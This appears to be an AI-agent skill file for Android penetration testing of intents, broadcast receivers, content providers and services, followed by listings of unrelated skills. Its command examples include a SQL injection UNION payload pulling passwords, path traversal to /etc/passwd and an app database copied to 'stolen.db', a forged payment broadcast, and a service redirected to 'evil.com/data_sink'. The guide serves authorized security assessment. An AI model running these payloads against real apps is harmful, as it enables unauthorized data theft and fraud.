testing-android-intents-for-vulnerabilities
Tests Android inter-process communication (IPC) through intents for vulnerabilities including intent injection, unauthorized component access, broadcast sniffing, pending intent hijacking, and content provider data leakage. Use when assessing Android app attack surface through exported components, testing intent-based data flows, or evaluating IPC security. Activates for requests involving Android intent security, IPC testing, exported component analysis, or Drozer assessment.
What this skill does
# Testing Android Intents for Vulnerabilities ## When to Use Use this skill when: - Assessing Android app exported activities, services, receivers, and content providers - Testing for intent injection and unauthorized component invocation - Evaluating broadcast receiver security for sensitive data exposure - Performing IPC-focused penetration testing on Android applications **Do not use** on production devices without explicit authorization. ## Prerequisites - Rooted Android device or emulator with ADB - Drozer agent installed on target device (`drozer agent.apk`) - Drozer console on host (`pip install drozer`) - Target APK decompiled with apktool for AndroidManifest.xml analysis - Frida for runtime intent monitoring ## Workflow ### Step 1: Enumerate Exported Components ```bash # Using Drozer drozer console connect run app.package.info -a com.target.app run app.package.attacksurface com.target.app # Output shows: # X activities exported # X broadcast receivers exported # X content providers exported # X services exported # List exported activities run app.activity.info -a com.target.app # List exported services run app.service.info -a com.target.app # List exported receivers run app.broadcast.info -a com.target.app # List content providers run app.provider.info -a com.target.app ``` ### Step 2: Test Exported Activities ```bash # Launch exported activities directly run app.activity.start --component com.target.app com.target.app.AdminActivity # Launch with intent extras run app.activity.start --component com.target.app com.target.app.ProfileActivity \ --extra string user_id 1337 # Test intent injection via data URI adb shell am start -a android.intent.action.VIEW \ -d "content://com.target.app/users/admin" com.target.app # If admin activity opens without auth, report as authorization bypass ``` ### Step 3: Test Broadcast Receivers ```bash # Send broadcast to exported receivers run app.broadcast.send --action com.target.app.PROCESS_PAYMENT \ --extra string amount "0.01" --extra string recipient "attacker" # Sniff broadcasts for sensitive data run app.broadcast.sniff --action com.target.app.USER_LOGIN # Via ADB adb shell am broadcast -a com.target.app.RESET_PASSWORD \ --es email "[email protected]" ``` ### Step 4: Test Content Providers ```bash # Query content providers for data leakage run app.provider.query content://com.target.app.provider/users run app.provider.query content://com.target.app.provider/users --projection "password" # Test SQL injection in content providers run app.provider.query content://com.target.app.provider/users \ --selection "1=1) UNION SELECT username,password FROM users--" # Test path traversal run app.provider.read content://com.target.app.provider/../../etc/passwd run app.provider.download content://com.target.app.provider/../databases/app.db /tmp/stolen.db # Find injectable providers run scanner.provider.injection -a com.target.app run scanner.provider.traversal -a com.target.app ``` ### Step 5: Test Pending Intent Vulnerabilities ```javascript // Monitor PendingIntent creation via Frida Java.perform(function() { var PendingIntent = Java.use("android.app.PendingIntent"); PendingIntent.getActivity.overload("android.content.Context", "int", "android.content.Intent", "int").implementation = function(context, requestCode, intent, flags) { console.log("[PendingIntent] getActivity:"); console.log(" Intent: " + intent.toString()); console.log(" Flags: " + flags); // Check for FLAG_IMMUTABLE (secure) vs FLAG_MUTABLE (vulnerable) var FLAG_MUTABLE = 0x02000000; if ((flags & FLAG_MUTABLE) !== 0) { console.log(" [VULN] FLAG_MUTABLE - PendingIntent can be modified by receiver"); } return this.getActivity(context, requestCode, intent, flags); }; }); ``` ### Step 6: Test Service Binding ```bash # Attempt to bind to exported services run app.service.start --action com.target.app.SYNC_SERVICE \ --extra string server "https://evil.com/data_sink" run app.service.send com.target.app com.target.app.MessengerService \ --msg 1 0 0 --extra string command "dump_database" --bundle-as-obj ``` ## Key Concepts | Term | Definition | |------|-----------| | **Exported Component** | Android component (activity/service/receiver/provider) accessible to other apps on the device | | **Intent** | Messaging object for requesting actions from other components; can be explicit (target specified) or implicit (action-based) | | **Pending Intent** | Token wrapping an intent for future execution by another app; mutable PendingIntents can be modified by recipients | | **Content Provider** | Component for structured data sharing between apps; SQL injection target if query parameters are not sanitized | | **Broadcast Receiver** | Component receiving system or app broadcasts; exported receivers can be triggered by any app | ## Tools & Systems - **Drozer**: Android security assessment framework for IPC testing with pre-built modules - **ADB**: Command-line tool for invoking intents, starting activities, and sending broadcasts - **Frida**: Runtime monitoring of intent handling and PendingIntent creation - **apktool**: APK decompilation for AndroidManifest.xml analysis of component export status - **Intent Fuzzer**: Automated tool for fuzzing intent parameters across exported components ## Common Pitfalls - **android:exported default changed in API 31**: Components with intent filters default to exported=true below API 31 but exported=false at API 31+. Check targetSdkVersion. - **Permission-protected components**: An exported component may still require a permission. Test with and without the required permission. - **Implicit intents vs explicit**: Only implicit intents (action-based) are interceptable by other apps. Explicit intents (specifying target) are secure. - **Custom permissions**: Apps can define custom permissions with different protection levels (normal, dangerous, signature). Signature-level permissions are only grantable to apps signed with the same certificate.
Related in Design
contribute
IncludedLocal-only OSS contribution command center. Auto-refreshes the user's in-flight PR and issue state on invoke so conversations start with full context — no need to brief Claude on what's in flight. Helps the user find issues to contribute to on GitHub, builds per-repo dossiers of what each upstream expects (CLA, DCO, branch convention, AI policy, draft-first, review bots, issue templates), runs deterministic gates before any external action so AI-assisted contributions don't reach maintainers as slop. State is markdown-only: candidate files at ~/.contribute-system/candidates/, repo dossiers at ~/.contribute-system/research/, append-only event log at ~/.contribute-system/log.jsonl. No database, no cloud calls. Use when the user asks about their PRs / issues / contributions, wants to find new work to take on, claim an issue, build/refresh a repo's dossier, or draft a Design Issue or PR. Trigger with "/contribute", "what's my PR status", "find a contribution", "claim issue X", "draft a Design Issue for Y", "refresh dossier for Z".
architectural-analysis
IncludedUser-triggered deep architectural analysis of a codebase or scoped subtree across eight modes — information architecture, data flow, integration points, UI surfaces, interaction patterns, data model, control flow, and failure modes. This skill should be used when the user asks to "diagram this codebase," "map the architecture," "show the data flow," "give me an ERD," "trace control flow," "find the integration points," "verify the layout pattern," "audit the UX architecture," or any similar request whose primary deliverable is mermaid diagrams plus cited reports under docs/architecture/. Dispatches haiku/sonnet sub-agents in parallel for per-mode exploration, then verifies every citation mechanically before any node lands in a diagram. Not for one-off prose explanations of code (use code-explanation) or for high-level system design from scratch (use system-design).
mcp
IncludedModel Context Protocol (MCP) server development and tool management. Languages: Python, TypeScript. Capabilities: build MCP servers, integrate external APIs, discover/execute MCP tools, manage multi-server configs, design agent-centric tools. Actions: create, build, integrate, discover, execute, configure MCP servers/tools. Keywords: MCP, Model Context Protocol, MCP server, MCP tool, stdio transport, SSE transport, tool discovery, resource provider, prompt template, external API integration, Gemini CLI MCP, Claude MCP, agent tools, tool execution, server config. Use when: building MCP servers, integrating external APIs as MCP tools, discovering available MCP tools, executing MCP capabilities, configuring multi-server setups, designing tools for AI agents.
react-native-skia
IncludedDesign, build, debug, and optimise high-polish animated graphics in React Native or Expo using @shopify/react-native-skia, Reanimated, and Gesture Handler. Use when the user wants canvas-driven UI, shaders, paths, rich text, image filters, sprite fields, Skottie, video frames, snapshots, web CanvasKit setup, or performance tuning for custom motion-heavy elements such as loaders, hero art, cards, charts, progress indicators, particle systems, or gesture-driven surfaces. Also use when the user asks for fluid, glow, glass, blob, parallax, 60fps/120fps, or GPU-friendly animated effects in React Native, even if they do not explicitly say "Skia". Do not use for ordinary form/layout work with standard views.
plaid
IncludedProduct Led AI Development — guides founders from idea to launched product. Six capabilities: Idea (discover a product idea), Validate (pressure-test the idea against fatal flaws, problem reality, competition, and 2-week MVP feasibility), Plan (vision intake + document generation), Design (translate image references into a design.md spec), Launch (go-to-market strategy), and Build (roadmap execution). Use when someone says "PLAID", "plaid idea", "help me find an idea", "product idea", "idea from my business", "idea from my expertise", "plaid validate", "validate my idea", "pressure-test", "is this idea good", "find fatal flaws", "validate the problem", "plan a product", "define my vision", "generate a PRD", "product strategy", "plaid design", "design from image", "translate image to design", "create design.md", "extract design tokens", "plaid launch", "go-to-market", "launch plan", "GTM strategy", "launch playbook", "plaid build", "build the app", "start building", or "execute the roadmap".
nextjs-framer-motion-animations
IncludedAdds production-safe Motion for React or Framer Motion animations to Next.js apps, including reveal, hover and tap micro-interactions, whileInView, stagger, AnimatePresence, layout and layoutId transitions, reorder, scroll-linked UI, and lightweight route-content transitions. Use when the user asks to add, refactor, or debug Motion or Framer Motion in App Router or Pages Router codebases, especially around server/client boundaries, reduced motion, LazyMotion, bundle size, hydration, or route transitions. Avoid for GSAP-style timelines, WebGL or 3D scenes, heavy scroll storytelling, or CSS-only effects unless Motion is explicitly requested.